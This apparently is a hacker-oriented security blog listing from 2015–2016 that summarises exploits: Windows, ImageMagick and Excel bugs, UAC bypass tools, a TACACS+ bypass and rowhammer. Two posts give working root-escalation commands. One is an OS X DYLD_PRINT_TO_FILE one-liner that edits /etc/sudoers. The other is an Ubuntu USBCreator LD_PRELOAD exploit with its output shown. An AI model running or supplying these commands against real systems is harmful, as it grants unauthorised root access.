Microsoft Windows Animation Manager Memory Corruption Vulnerability (MS16-132) (CVE-2016-7205) + POC:

by admin

Wednesday, November 9th, 2016 at 11:21 am

A memory corruption in the Microsoft Windows Animation Manager which allows a malicious user to remotely execute arbitrary code on a vulnerable user’s machine, in the context of the current user. JavaScript POC ::HERE::

Image Tragick CVE-2016–3714

by admin

Tuesday, May 3rd, 2016 at 10:45 pm

logo-medium
☑ Nickname
☑ Logo
☑ Hype
☑ Website
☐ POC

https://imagetragick.com/
ImageMagick reported today (CVE-2016–3714) allows image uploads to trick the ImageMagick software into running commands instead, leading to a remote code execution(RCE)bug. More info ::HERE::

POC for MS16-042 Excel Heap Exploit

by admin

Thursday, April 14th, 2016 at 1:13 am

A new heap memory corruption (Out-of-Bounds Read) that affects Microsoft Office Excel 2007,2010,2013 and 2016. This vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office Excel file (.xlsm).
Advisory & POC

Windows 10 RS1 14316

by admin

Sunday, April 10th, 2016 at 3:44 pm

The build brings new changes targeting previously exploited dll-hijacking and uac bypass method vulnerabilities.

cliconfg.exe – can no longer be used as target for autoelevation as MS changed it manifest to autoelevate=false.

mmc.exe – event viewer console fixed, dll hijacking no longer works.

fake IIS inetmgr.exe launch from inetsrv appinfo hardcoded directory fixed too – Windows will not allow you to run & autoelevate anything except legit InetMgr.exe from system32\inetsrv directory.

Bypasses alot of the methods used by UACme that is posted in my ::Wiki::

BypassUAC

by admin

Friday, January 29th, 2016 at 2:55 pm

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoors https://github.com/xsysvermin/BypassUAC

UPDATE: apparently was ripped from the original https://github.com/hfiref0x/UACME

TACACS+: Bypassing the Cisco’s auth

by admin

Tuesday, November 24th, 2015 at 2:50 pm

3 methods to get into Terminal Access Controller Access-Control System Plus (TACACS+) http://agrrrdog.blogspot.ca

Here’s some cisco rootkits too 🙂 exploit-db.com

Red Hat userhelper vulnerability

by admin

Thursday, July 23rd, 2015 at 9:35 pm

Two security vulnerabilities were found in the userhelper utility, (part of the usermode package) and the libuser library. Authenticated, local users with shell access could combine these vulnerabilities to achieve local privilege escalation to the root user, it lets users change /etc/passwd. These flaws have been assigned CVE-2015-3245 and CVE-2015-3246. Info was released as soon as patch was, better hurry and patch 🙂 Src: http://seclists.org/oss-sec/2015/q3/186

Root Privs on OS X 10.10

by admin

Wednesday, July 22nd, 2015 at 5:17 pm

OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability: Affects OS X Yosemite v.10.10, the latest stable release, and the beta version 10.10.5 , so many people are affected by this. The flaw is the environment variable called DYLD_PRINT_TO_FILE that was added in Yosemite. It specifies where in the file system a component of the operating system called the dynamic linker can log error messages, and it can be abused by an attacker to modify arbitrary files as root. You can escalate to root privileges  by typing this in terminal:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

::MORE INFO HERE::

Priv Escalation in Ubuntu USBCreator service

by admin

Thursday, April 23rd, 2015 at 9:40 am

On Ubuntu and need to escalate to root and don’t have sudo?

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown(“/tmp/test”, 0, 0);
chmod(“/tmp/test”, 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,”foo”,XAUTHORITY,”foo”,LD_PRELOAD,”/tmp/test.so”
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id

::Source::

Hammer Time.

by admin

Monday, March 9th, 2015 at 2:36 pm

HammerTime
“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows.
More info: Exploiting the DRAM rowhammer bug to gain kernel privileges

IP: Loading... - Host: Loading...
IP Geolocation: unknown.

We love our country, but fear our government.